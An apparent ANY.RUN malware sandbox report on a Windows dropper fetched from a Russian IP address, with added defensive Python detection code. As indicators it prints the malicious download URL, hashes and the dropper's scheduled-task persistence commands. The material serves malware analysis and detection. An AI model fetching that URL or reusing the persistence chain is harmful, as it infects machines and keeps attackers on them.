URL: | http://89.109.35.231/exchange/wcxkmr.exe |
Full analysis: | https://app.any.run/tasks/d88ae982-2c69-434f-be3f-6c4f4b96c9a6 |
Verdict: | Malicious activity |
Analysis date: | June 12, 2019, 07:24:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 5D2574D0228B8B3A143F09868A969D74 |
SHA1: | 5C9BED577A2210DB2BD39BD8D4381840629B36F8 |
SHA256: | 6ABE942044593C8DF65E6AA144D2E6848CEC18B4339A922B0F572C7A82B48A96 |
SSDEEP: | 3:N1K/M9vACAIMIbAC:Ck9vACdMQ |
Note: the SSDEEP signature above uses block size 3, which ssdeep only selects for inputs of under about 200 bytes, so these three hashes describe the submitted object (the 40-byte URL), not a PE file. The payload actually written to disk, wcxkmr[1].exe, has MD5 5C9CA45B60DBC3EE0BFD36E404EA8D98 / SHA256 0CF94DF28CB907B5DEA25300B4BCF5853715277AA8FD03128D4D3E0744A38471 (see the file table below); pivot on those and on the dropped maintenance.exe, not on the header hashes.
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity level | Description | Exit code | Version
---|---|---|---|---|---|---|---|---|---|---
4064 | "C:\Program Files\Internet Explorer\iexplore.exe" http://89.109.35.231/exchange/wcxkmr.exe | C:\Program Files\Internet Explorer\iexplore.exe | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Internet Explorer | 1 | 8.00.7600.16385 (win7_rtm.090713-1255)
2632 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:4064 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | admin | Microsoft Corporation | LOW | Internet Explorer | 0 | 8.00.7600.16385 (win7_rtm.090713-1255)
3544 | "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wcxkmr[1].exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wcxkmr[1].exe | — | iexplore.exe | admin | — | MEDIUM | ``'i`u\#qsP94Vy`` | 0 | 99.8.1.0
3560 | cmd /c ""C:\Users\admin\AppData\Local\Temp\zbe201961272453514.bat" " | C:\Windows\system32\cmd.exe | — | wcxkmr[1].exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2992 | cmd /c ""C:\Users\admin\AppData\Local\Temp\zb201961272453514.bat" " | C:\Windows\system32\cmd.exe | — | wcxkmr[1].exe | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 1 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2176 | Schtasks.EXE /delete /tn "Maintenance" /f | C:\Windows\system32\schtasks.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Manages scheduled tasks | 1 | 6.1.7600.16385 (win7_rtm.090713-1255)
252 | chcp 1251 | C:\Windows\system32\chcp.com | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Change CodePage Utility | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
3680 | Schtasks.EXE /create /tn "Maintenance" /xml "C:\Users\admin\AppData\Local\Temp\zx201961272453514.xml" | C:\Windows\system32\schtasks.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Manages scheduled tasks | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
3984 | timeout /t 3 /nobreak | C:\Windows\system32\timeout.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | timeout - pauses command processing | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
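The process tree above is a compact persistence routine: the executable launched from the IE cache runs a batch file from %TEMP%, which deletes any existing task named "Maintenance" (exit code 1 here simply means no such task existed yet), switches the console to code page 1251 (Windows Cyrillic), registers the task again from an XML definition in %TEMP%, and pauses for three seconds. The following is an added example, not part of the ANY.RUN report, showing how a hunting rule over process-creation telemetry can tie the schtasks call back to the browser download. The events are constructed from the table above; explorer.exe's PID (1000) and the attribution of the schtasks/chcp/timeout children to cmd.exe 3560 are assumptions, since the page lists only "cmd.exe" as their parent.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


Finding = Tuple[str, int, str]  # (rule name, pid, detail)

# Constructed from the process table in the report. Assumptions not on the page:
# explorer.exe gets placeholder PID 1000, and the children listed only as
# "cmd.exe"-parented are attributed to cmd.exe 3560.
EVENTS: List[ProcEvent] = [
    ProcEvent(1000, None, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(4064, 1000, r"C:\Program Files\Internet Explorer\iexplore.exe",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" http://89.109.35.231/exchange/wcxkmr.exe'),
    ProcEvent(2632, 4064, r"C:\Program Files\Internet Explorer\iexplore.exe",
              r'"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:4064 CREDAT:71937'),
    ProcEvent(3544, 2632,
              r"C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wcxkmr[1].exe",
              r'"C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wcxkmr[1].exe"'),
    ProcEvent(3560, 3544, r"C:\Windows\system32\cmd.exe",
              r'cmd /c ""C:\Users\admin\AppData\Local\Temp\zbe201961272453514.bat" "'),
    ProcEvent(2992, 3544, r"C:\Windows\system32\cmd.exe",
              r'cmd /c ""C:\Users\admin\AppData\Local\Temp\zb201961272453514.bat" "'),
    ProcEvent(2176, 3560, r"C:\Windows\system32\schtasks.exe",
              r'Schtasks.EXE /delete /tn "Maintenance" /f'),
    ProcEvent(252, 3560, r"C:\Windows\system32\chcp.com", "chcp 1251"),
    ProcEvent(3680, 3560, r"C:\Windows\system32\schtasks.exe",
              r'Schtasks.EXE /create /tn "Maintenance" /xml "C:\Users\admin\AppData\Local\Temp\zx201961272453514.xml"'),
    ProcEvent(3984, 3560, r"C:\Windows\system32\timeout.exe", "timeout /t 3 /nobreak"),
]

# An .exe executing straight out of the IE cache (either the normal or the Low-integrity tree).
BROWSER_CACHE_EXE = re.compile(r"\\Temporary Internet Files\\(?:Low\\)?Content\.IE5\\.*\.exe$", re.I)
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
SCHTASKS_DELETE = re.compile(r'/delete\b.*?/tn\s+"?([^"\s]+)"?', re.I)
SCHTASKS_CREATE_XML = re.compile(r'/create\b.*?/tn\s+"?([^"\s]+)"?.*?/xml\s+"?([^"]+)"?', re.I)


def ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Walk parent links up to the root, guarding against PID-reuse loops."""
    chain: List[ProcEvent] = []
    seen = {ev.pid}
    cur = by_pid.get(ev.ppid) if ev.ppid is not None else None
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid) if cur.ppid is not None else None
    return chain


def spawned_by_cache_exe(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> bool:
    return any(BROWSER_CACHE_EXE.search(a.image) for a in ancestors(ev, by_pid))


def detect(events: List[ProcEvent]) -> List[Finding]:
    """Evaluate the events (in creation order) and return one finding per matched rule."""
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    deleted_tasks: Dict[str, int] = {}  # task name -> pid of the schtasks /delete
    for e in events:
        exe = e.image.rsplit("\\", 1)[-1].lower()
        if BROWSER_CACHE_EXE.search(e.image):
            findings.append(("exec_from_browser_cache", e.pid, e.image))
        if exe == "cmd.exe" and USER_TEMP.search(e.cmdline) and ".bat" in e.cmdline.lower():
            rule = "cmd_runs_temp_batch"
            if spawned_by_cache_exe(e, by_pid):
                rule += "_from_cache_exe"
            findings.append((rule, e.pid, e.cmdline))
        if exe == "schtasks.exe":
            m = SCHTASKS_DELETE.search(e.cmdline)
            if m:
                deleted_tasks[m.group(1).lower()] = e.pid
            m = SCHTASKS_CREATE_XML.search(e.cmdline)
            if m:
                task, xml_path = m.group(1), m.group(2)
                if USER_TEMP.search(xml_path):  # task definition staged in %TEMP%
                    findings.append(("schtasks_create_from_temp_xml", e.pid, task))
                if task.lower() in deleted_tasks:  # delete-then-recreate of the same name
                    findings.append(("schtasks_delete_then_recreate", e.pid, task))
                if spawned_by_cache_exe(e, by_pid):  # whole chain rooted in a browser download
                    findings.append(("persistence_from_browser_download", e.pid, task))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:36} pid={pid:<5} {detail}")
```

The ancestry walk is what makes the last rule useful in practice: schtasks /create /xml is also run by legitimate installers, but one whose grandparent is an executable under Content.IE5 and whose XML lives in %TEMP% is the pattern seen here. The delete-then-recreate check is worth keeping as a separate signal because a real maintenance task is rarely reinstalled with /f a few seconds before being created.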
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
4064 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF8E69440BF2AC1E56.TMP | — | — | —
4064 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico | — | — | —
4064 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | — | —
4064 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{27E6829A-8CE3-11E9-A370-5254004A04AF}.dat | binary | 6C8D28A0E6FFEAD478FBDA0FACEA1B13 | AF758F9779B27F46E89472306B97641444FFE221A54FC9F46587FABA5616EE98
2632 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\9W6CHMMW\wcxkmr[1].exe | executable | 5C9CA45B60DBC3EE0BFD36E404EA8D98 | 0CF94DF28CB907B5DEA25300B4BCF5853715277AA8FD03128D4D3E0744A38471
2632 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | 1B228345A88416995D771707FF28547C | 4AB8002B110E4F02F3BC2A196B2719140D108C872E23BA868ECA4DD8272C8FAC
3544 | wcxkmr[1].exe | C:\Users\admin\AppData\Roaming\Maintenance\apps\maintenance.exe | executable | 3234A708095A7662A5E94543CA7B12E3 | 021174C1FAF22A9B4C2805932865FDD92134A92ABEE81C80DDCB729FB0D71D70
2632 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | BCA0BBDAD66E2C389E568D86CB363CD4 | 97502AA88D06489D841ADF95EB86267BB0AAE27CB27E2411E14E12F1E271441B
4064 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF48A47E4B9B11C662.TMP | — | — | —
4064 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{27E68299-8CE3-11E9-A370-5254004A04AF}.dat | — | — | —
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2632 | iexplore.exe | GET | — | 89.109.35.231:80 | http://89.109.35.231/exchange/wcxkmr.exe | RU | — | — | suspicious |
4064 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4064 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
2632 | iexplore.exe | 89.109.35.231:80 | — | PJSC Rostelecom | RU | suspicious |
Domain | IP | Reputation |
---|---|---|
www.bing.com | 204.79.197.200 | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
2632 | iexplore.exe | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
2632 | iexplore.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2632 | iexplore.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
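All three alerts fire on the same transaction and encode two observations: the request asked a bare IPv4 host (no domain) for a .exe, and the response body began with an MZ header. The block below is an added example, not code from the report or from the Emerging Threats ruleset, that reproduces that logic over a constructed request/response pair modelled on the 89.109.35.231 download and on the benign bing.com favicon fetch; the alert strings are my own approximations of what the signature names imply, and the PE body is a synthetic 88-byte header (MZ, e_lfanew = 0x40, "PE\0\0"), not the real payload.

```python
import re
import struct
from typing import Dict, List, Tuple

# A bare IPv4 literal, optionally with a port, as it appears in an HTTP Host header.
DOTTED_QUAD = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?$")


def _parse_head(raw: bytes) -> Tuple[List[str], Dict[str, str], bytes]:
    """Split an HTTP message into (start-line tokens, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].split(" "), headers, body


def looks_like_pe(body: bytes) -> bool:
    """True if body carries a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    return body[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify(request: bytes, response: bytes) -> Dict[str, object]:
    """Emit the alerts a dotted-quad / MZ-response policy would raise for one HTTP exchange."""
    (method, target, *_), req_headers, _ = _parse_head(request)
    status_line, _, body = _parse_head(response)
    host = req_headers.get("host", "")
    dotted = DOTTED_QUAD.match(host) is not None
    alerts: List[str] = []
    # Request side: an executable requested from a host named only by IP address.
    if method == "GET" and dotted and target.lower().endswith((".exe", ".dll")):
        alerts.append("executable request to dotted-quad host")
    # Response side: the ET-style check keys on the MZ magic alone, so a DOS stub
    # or a truncated download still alerts; pe_verified reports the stronger check.
    if body[:2] == b"MZ":
        alerts.append("MZ response body")
        if dotted:
            alerts.append("MZ response from dotted-quad host")
    status = int(status_line[1]) if len(status_line) > 1 and status_line[1].isdigit() else None
    return {"status": status, "alerts": alerts, "pe_verified": looks_like_pe(body)}


def _fake_pe() -> bytes:
    """Constructed minimal PE-shaped body: MZ header, e_lfanew = 0x40, PE signature at 0x40."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


# Constructed sample traffic modelled on the two GETs in the report (not captured packets).
PAYLOAD_REQUEST = (b"GET /exchange/wcxkmr.exe HTTP/1.1\r\n"
                   b"Host: 89.109.35.231\r\n"
                   b"User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)\r\n\r\n")
PAYLOAD_BODY = _fake_pe()
PAYLOAD_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
                    + (b"Content-Length: %d\r\n\r\n" % len(PAYLOAD_BODY)) + PAYLOAD_BODY)

FAVICON_REQUEST = b"GET /favicon.ico HTTP/1.1\r\nHost: www.bing.com\r\n\r\n"
FAVICON_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: image/x-icon\r\nContent-Length: 6\r\n\r\n"
                    b"\x00\x00\x01\x00\x01\x00")


if __name__ == "__main__":
    for name, req, resp in (("payload", PAYLOAD_REQUEST, PAYLOAD_RESPONSE),
                            ("favicon", FAVICON_REQUEST, FAVICON_RESPONSE)):
        print(name, classify(req, resp))
```

Two points carry over to real rule tuning. The Host-header check is what separates this from ordinary software downloads: a CDN serving an .exe by hostname produces the "MZ response" alert only, while an IP-literal host trips all three. And because the MZ check is deliberately cheap, pe_verified is worth logging alongside the alert; in the report the payload stream itself was not fully captured (HTTP code and size are blank), so the file-table hash of wcxkmr[1].exe is the only confirmation that a complete PE arrived.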